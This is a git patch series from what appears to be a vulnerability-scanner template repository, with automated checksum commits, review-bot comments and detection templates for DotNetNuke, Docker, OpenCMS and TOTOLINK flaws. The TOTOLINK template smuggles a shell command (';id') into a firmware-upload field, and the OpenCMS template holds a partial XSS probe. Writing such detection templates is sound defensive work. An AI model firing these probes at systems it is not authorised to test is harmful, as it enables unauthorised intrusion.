@@ -3,7 +3,7 @@ id: CVE-2015-2794 info: name: DotNetNuke 07.04.00 - Administration Authentication Bypass author: 1337kro - severity: high + severity: critical description: | The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. reference: @@ -26,7 +26,7 @@ info: tags: cve,cve2015,dotnetnuke,auth-bypass,install http: - - method: GET + - method: GET path: - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE" From 35e2acbcd622a3edd3c34e41730b7977b2d2a267 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:15 +0000 Subject: [PATCH 39/64] Auto Generated New Template Addition List [Tue Dec 26 14:30:15 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d24e17c29..42a4564a2a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +http/cves/2015/CVE-2015-2794.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml From 35a02a30656fe174dd114707a2b909f6d19de863 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:17 +0000 Subject: [PATCH 40/64] Auto Generated cves.json [Tue Dec 26 14:30:17 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index b67a7f0312..5227679936 100644 --- a/cves.json +++ b/cves.json 
@@ -271,6 +271,7 @@ {"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"} {"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"} {"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. 
The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"} +{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"} {"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"} {"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"} {"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. 
(dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 71b0875aee..8953152fe4 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -94707e96d497767157be7c0c5b06fac3 +8ba13563d80d4c1e36d4b6dff2c7f027 From 998930ffc2ac56b375c97f6164a006e538f3fd93 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:30:36 +0000 Subject: [PATCH 41/64] Auto Generated Templates Checksum [Tue Dec 26 14:30:36 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9c9f108b15..e6795d77c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -936,6 +936,7 @@ http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97 http/cves/2015/CVE-2015-2166.yaml:9435d5238cddf255b9814a424181cb529938bcad http/cves/2015/CVE-2015-2196.yaml:dbd9f617f9f46da1f41b7e7b37516bd03bef7b8d http/cves/2015/CVE-2015-2755.yaml:2a87aa2692d6aed72de82010b13300b8cb1b9f8f +http/cves/2015/CVE-2015-2794.yaml:b036e7c53bd80e6f25df2d0ec1cd6d3b707d9429 http/cves/2015/CVE-2015-2807.yaml:770045f6ee23a0ec2ee49617c6925bf7f2259681 http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df http/cves/2015/CVE-2015-2996.yaml:b03d095677bb8644c23b9f2cea10c194d714f879 
@@ -6621,7 +6622,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2 -http/token-spray/api-openai.yaml:9d86191e26bae37c68d5986d46e1ee613b81eb7c +http/token-spray/api-openai.yaml:98b146f8013df819687095a1bc26f045513d373e http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a @@ -7209,7 +7210,7 @@ http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 -http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:1ab8db1b41bfc5e613f4fbe99f417739d332eb31 +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc 
@@ -7709,7 +7710,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:42fd128a2bf9803063b17dfe3796e7c460f14fa4 +templates-checksum.txt:b4eb0ed554226ec504c25c95a5d9e1714f0a0955 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 866324aef9e51ddab14682b29adce4f0dec3e86f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Dec 2023 14:32:11 +0000 Subject: [PATCH 42/64] Auto Template Signing [Tue Dec 26 14:32:11 UTC 2023] :robot: --- http/cves/2015/CVE-2015-2794.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index ca3d0cdf13..fe3ac288a1 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402201158c001259e4db42e4a00041d56cb95363728da7170e407c3c0d99701f0f426022078549a7f4b8f1aca49f2e0c6dd0849c52df6812d9e901daa10b925a59aea47c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 346a5b3546b0decc0988c37fe5f5867ececcefcf Mon Sep 17 00:00:00 2001 From: Arm!tage <48816467+Arrnitage@users.noreply.github.com> Date: Wed, 27 Dec 2023 10:20:29 +0800 Subject: [PATCH 43/64] Update docker-daemon-exposed.yaml --- http/exposures/docker-daemon-exposed.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index b0f94be1b1..152f9daaf0 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml 
@@ -40,8 +40,6 @@ http: part: body_2 words: - '[]' - - '"ImageID":' - - '"HostConfig":' condition: and extractors: From 0cac82af9f64a32a2d6881b8c939a051c2c616b0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:50:50 +0000 Subject: [PATCH 44/64] Auto Generated New Template Addition List [Wed Dec 27 05:50:50 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 42a4564a2a..32c14f6e7c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2015/CVE-2015-2794.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 6288db3204d40a54bccb0cfcc8dc6aec32aadcb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:51:14 +0000 Subject: [PATCH 45/64] Auto Generated Templates Checksum [Wed Dec 27 05:51:14 UTC 2023] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e6795d77c1..d4577df9c5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -12,8 +12,8 @@ code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:4500cac1239266cc0c96b02fc4bf689290b18f93 -cves.json-checksum.txt:f110519bd9447c733f8276833f45a4c38375f1ed +cves.json:06f1b457f42fb28649ba5342a462c84c3f8c2fda +cves.json-checksum.txt:fc7c554376e31384ec60488e43ac7b322c0b616a dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 
@@ -936,7 +936,7 @@ http/cves/2015/CVE-2015-2080.yaml:180c0d9b39eebb25504e19d83aaab1b4cf8bfa97 http/cves/2015/CVE-2015-2166.yaml:9435d5238cddf255b9814a424181cb529938bcad http/cves/2015/CVE-2015-2196.yaml:dbd9f617f9f46da1f41b7e7b37516bd03bef7b8d http/cves/2015/CVE-2015-2755.yaml:2a87aa2692d6aed72de82010b13300b8cb1b9f8f -http/cves/2015/CVE-2015-2794.yaml:b036e7c53bd80e6f25df2d0ec1cd6d3b707d9429 +http/cves/2015/CVE-2015-2794.yaml:ba064904aecb2a2d6c43afa9c4b014fe48531535 http/cves/2015/CVE-2015-2807.yaml:770045f6ee23a0ec2ee49617c6925bf7f2259681 http/cves/2015/CVE-2015-2863.yaml:4479beacef9707ef297d61a4a357119d030687df http/cves/2015/CVE-2015-2996.yaml:b03d095677bb8644c23b9f2cea10c194d714f879 @@ -7515,6 +7515,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:70cb8c72cfea4cf75435fe633f4b0ad9eeba5cd1 http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d 
@@ -7710,7 +7711,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:b4eb0ed554226ec504c25c95a5d9e1714f0a0955 +templates-checksum.txt:61f02f0373d4cf402f1afc9519d221eefc87863c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 47efb3917ea64f8a712548817002a5835e0a5719 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 05:52:47 +0000 Subject: [PATCH 46/64] Auto Template Signing [Wed Dec 27 05:52:47 UTC 2023] :robot: --- http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml index c01041ca93..312025dd3b 100644 --- a/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100922859f664e4119692c97837afcf0e55f50952e31ba4d106bfced7a702cde4c3022100db43d0d8ca69943f8ecf515a9ee9e142599c9d652ffef759f0238a20f7056e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3373976e28f2efdb4bb0d1083fec0747ee22e977 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 27 Dec 2023 13:15:53 +0530 Subject: [PATCH 47/64] dsl - update --- http/exposures/docker-daemon-exposed.yaml | 23 ++++++----------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index 152f9daaf0..e62b53f228 100644 
--- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -23,23 +23,12 @@ http: GET /v{{version}}/containers/json HTTP/1.1 Host: {{Hostname}} - matchers-condition: or matchers: - - type: word - part: body_2 - words: - - "Id" - - "Names" - - "Image" - - "Command" - - "PrivatePort" - - "PublicPort" - condition: and - - - type: word - part: body_2 - words: - - '[]' + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_1, "ApiVersion") && contains(body_1, "GitCommit") && contains(body_1, "GoVersion") && contains(body_1, "KernelVersion")' + - 'contains(body_2, "Id") && contains(body_2, "Names") && contains(body_2, "Image") && contains(body_2, "Command") && contains(body_2, "PrivatePort") && contains(body_2, "PublicPort") || contains(body_2, "[]")' condition: and extractors: @@ -48,4 +37,4 @@ http: group: 1 regex: - '"ApiVersion":"(.*?)"' - internal: true + internal: true \ No newline at end of file From 9b9c642d43f6152b2333084039acdc8e1ddabcfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:50:06 +0000 Subject: [PATCH 48/64] Auto Generated New Template Addition List [Wed Dec 27 07:50:05 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 32c14f6e7c..b0a9d7a995 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml From 075ac4f0e8d93006bec7619843d6297eea9af433 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:50:14 +0000 Subject: [PATCH 49/64] Auto Generated Templates Checksum [Wed Dec 27 07:50:14 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
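Review bot: The third DSL expression chains six `contains(body_2, ...)` calls with `&&` and then appends `|| contains(body_2, "[]")`; it relies on `&&` binding tighter than `||`, which holds in nuclei's DSL but is easy to misread, and `contains(body_2, "Id")` is a very weak token on its own. If the minimum nuclei version in use provides it, `contains_all` expresses the intent without the precedence question: `'contains_all(body_2, "Id", "Names", "Image", "Command", "PrivatePort", "PublicPort") || contains(body_2, "[]")'`. The `body_1` check for `ApiVersion`/`GitCommit`/`GoVersion`/`KernelVersion` is what keeps the `[]` branch from matching arbitrary JSON, so a one-line comment above the DSL block saying so would help the next maintainer. The `http` request block begins outside the hunk.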
diff --git a/templates-checksum.txt b/templates-checksum.txt index d4577df9c5..8775934701 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4231,6 +4231,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:b7a010abea8ee72e3c7ffb7602f2fd10b7 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:ea6beec4c6f22d31b0402f8ad1590aa8d87166de http/exposures/configs/zend-config-file.yaml:dd51767a5f5fbbc68e0d0f2f82ecaf7eb390a47b +http/exposures/docker-daemon-exposed.yaml:1a906cb866350a3f2615324f8a11328aab8671e0 http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90 @@ -7515,7 +7516,7 @@ http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:834c86504e945da05e4a3c818 http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:0748e078a3e4d2b1c2665ee271393df76f2b50c4 http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:3bf657199eaa62538621ae0b76b611ecdafe7d83 http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:1ffe1e3009245779da07ca87f610f0efc35c174e -http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:70cb8c72cfea4cf75435fe633f4b0ad9eeba5cd1 +http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml:2e2099e6cd39c30a2b7f8096d5e65340142e009b http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:ba49da8c71e4e9b1ba7fd6c86e259418262a38db http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:4585fe5be1b00ae9d8546f4e3bf86b588f1ea186 http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:87bb7c0da6d60ee728ce4892ced883dbb9e4ba9d 
@@ -7711,7 +7712,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:61f02f0373d4cf402f1afc9519d221eefc87863c +templates-checksum.txt:0c2a4ee0f79c4db800e40b84866a0f956830ce4a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 97cfaf6f53ba1e3e144418e9b78a2977f5da7c17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 07:51:49 +0000 Subject: [PATCH 50/64] Auto Template Signing [Wed Dec 27 07:51:49 UTC 2023] :robot: --- http/exposures/docker-daemon-exposed.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposures/docker-daemon-exposed.yaml b/http/exposures/docker-daemon-exposed.yaml index e62b53f228..857e0c35fb 100644 --- a/http/exposures/docker-daemon-exposed.yaml +++ b/http/exposures/docker-daemon-exposed.yaml @@ -37,4 +37,5 @@ http: group: 1 regex: - '"ApiVersion":"(.*?)"' - internal: true \ No newline at end of file + internal: true +# digest: 490a00463044022078569870dba91a13ef48bf89cc7acf390bd48f5466e1721acfa1337f23fd752802207843a2e01e46cb87cdc2cfa9f8ea3a3d5a0fa0ed378bee864de3e52ca24a4339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1d1a76f97ef5ff9544914b01acbcde346258db25 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 27 Dec 2023 14:22:44 +0530 Subject: [PATCH 51/64] Create CVE-2023-42343.yaml --- http/cves/2023/CVE-2023-42343.yaml | 32 ++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/cves/2023/CVE-2023-42343.yaml 
diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml new file mode 100644
index 0000000000..cbd72cf1c8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42343.yaml
@@ -0,0 +1,32 @@
+id: CVE-2023-42343
+
+info:
+ name: OpenCMS - Cross-Site Scripting
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.
+ remediation: Fixed in 10.5.1.
+ reference:
+ - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
+ classification:
+ cve-id: CVE-2023-42343
+ metadata:
+ max-request: 1
+ shodan-query: "/opencms/"
+ verified: true
+ tags: cve,cve2023,xss,opencms
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27">'
+ headers:
+ Content-Type: application/cmisquery+xml
+
+ matchers:
+ - type: word
+ words:
+ - 'Apache Chemistry OpenCMIS'
+ - ''
+ part: body
From e058e85d2d11994d69e5299fb453383bc0c8d8af Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Dec 2023 14:49:00 +0530 Subject: [PATCH 52/64] Update CVE-2023-46574.yaml
---
 http/cves/2023/CVE-2023-46574.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-)
diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml
index b72b32e83e..344f615518 100644
--- a/http/cves/2023/CVE-2023-46574.yaml
+++ b/http/cves/2023/CVE-2023-46574.yaml
@@ -18,11 +18,11 @@ info:
 epss-percentile: 0.60602
 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:*
 metadata:
- verified: true
 max-request: 1
+ verified: true
+ shodan-query: title:"Totolink"
 vendor: totolink
 product: a3700r_firmware
- shodan-query: title:"Totolink"
 tags: cve,cve2023,totolink,router,iot,rce

 flow: http(1) && http(2)
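Review bot: The second `words` entry of the new template's body matcher is, as rendered here, the empty string `''`; an empty word is found in every body, so the template fires on any host serving the OpenCMIS AtomPub page whether or not the `id` value is reflected — if an HTML payload was stripped in rendering, the committed file should still be checked, and that entry must hold the exact string that reflects back. The `description` says OpenCMS "below 10.5.1" while `remediation` says "Fixed in 10.5.1", and the only `reference` is an XXE write-up, so the affected range wants confirming against the CVE record and that record added to `reference`. `Content-Type: application/cmisquery+xml` on a body-less GET is unexplained; if the reflection depends on it, note that above `headers:`, otherwise mark it `# TODO(review): document why a CMIS query content type is sent on a GET with no body`.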
@@ -39,14 +39,13 @@ http:
 - 'contains(body, "TOTOLINK")'
 condition: and

- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/cstecgi.cgi"
- body: |
- {
- "topicurl":"UploadFirmwareFile",
- "FileName":";id"
- }
+ - raw:
+ - |
+ GET /cgi-bin/cstecgi.cgi HTTP/1.1
+ Host: {{Hostname}}
+
+ {"topicurl":"UploadFirmwareFile","FileName":";id"}
+
 matchers-condition: and
 matchers:
 - type: regex
From 3dcaf845d060919f82613ce2f6e2c5019d40f278 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:26:12 +0000 Subject: [PATCH 53/64] Auto Generated New Template Addition List [Wed Dec 27 09:26:12 UTC 2023] :robot:
---
 .new-additions | 1 + 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index b0a9d7a995..eb285316c1 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
From 623b71b8d3f45774eb52e22c1ea6f6812decb4f9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:26:24 +0000 Subject: [PATCH 54/64] Auto Generated Templates Checksum [Wed Dec 27 09:26:24 UTC 2023] :robot:
---
 templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 8775934701..ddca8868f3 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
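Review bot: The new `raw` request sends a JSON body on a `GET` with no `Content-Type`, and nothing in the hunk says why — a reader will take the method for a mistake, and any intermediary that drops GET bodies silently neutralises the check. Presumably the move from `method:`/`body:` to `raw:` is because the structured form does not transmit a body for GET; if the firmware genuinely requires GET-with-body, record that above the request, e.g. `# raw request on purpose: the device reads the JSON command from the body of a GET, which the structured method/body form does not send`, and if it also accepts POST, prefer POST. The `matchers` block begins on the hunk's last line and continues outside it.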
